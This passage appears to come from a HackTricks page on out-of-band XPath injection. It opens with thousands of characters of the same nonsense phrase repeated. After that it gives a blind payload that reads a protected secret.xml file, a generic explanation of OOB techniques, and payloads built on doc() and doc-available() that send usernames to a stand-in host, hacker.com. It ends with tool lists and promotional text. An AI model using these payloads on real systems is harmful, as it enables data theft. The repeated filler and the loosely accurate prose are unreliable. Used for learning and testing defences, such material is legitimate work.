vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. QaD jImej vItlhutlh. Qa

(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127

OOB Exploitation

Introduction

Out-of-Band (OOB) exploitation is a technique used in XPath Injection attacks to extract data from a vulnerable web application. XPath Injection occurs when an attacker is able to manipulate the XPath query used by the application to retrieve data from an XML database.

OOB Exploitation Techniques

There are several OOB exploitation techniques that can be used in XPath Injection attacks:

1. Blind OOB Exploitation: In this technique, the attacker injects a malicious payload into the XPath query, which triggers an out-of-band communication from the vulnerable application to an external server controlled by the attacker. The attacker can then analyze the communication to extract sensitive information.

2. Time-based OOB Exploitation: In this technique, the attacker injects a payload that causes a delay in the application's response. By measuring the time it takes for the response to arrive, the attacker can infer whether the injected payload was successful or not.

3. Error-based OOB Exploitation: In this technique, the attacker injects a payload that causes the application to generate an error message. The error message is then sent to an external server controlled by the attacker, allowing them to extract information from it.

OOB Exploitation Tools

There are several tools that can be used to perform OOB exploitation in XPath Injection attacks:

• Burp Suite: Burp Suite is a popular web application testing tool that includes features for intercepting and modifying HTTP requests and responses. It can be used to inject payloads and analyze out-of-band communications.

• OWASP ZAP: OWASP ZAP is another web application testing tool that can be used to intercept and modify HTTP requests and responses. It also includes features for detecting and exploiting XPath Injection vulnerabilities.

• SQLMap: SQLMap is a powerful tool for detecting and exploiting SQL injection vulnerabilities. It can also be used to perform OOB exploitation in XPath Injection attacks.

Conclusion

OOB exploitation is a powerful technique that can be used to extract data from a vulnerable web application. By understanding the different OOB exploitation techniques and using the right tools, an attacker can successfully exploit XPath Injection vulnerabilities and extract sensitive information.

doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))

#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to

Qap automatic tool

• xcat
• xxxpwn
• xxxpwn_smart
• xpath-blind-explorer
• XmlChor

References

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
• https://wiki.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)
• https://www.w3schools.com/xml/xpath_syntax.asp

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.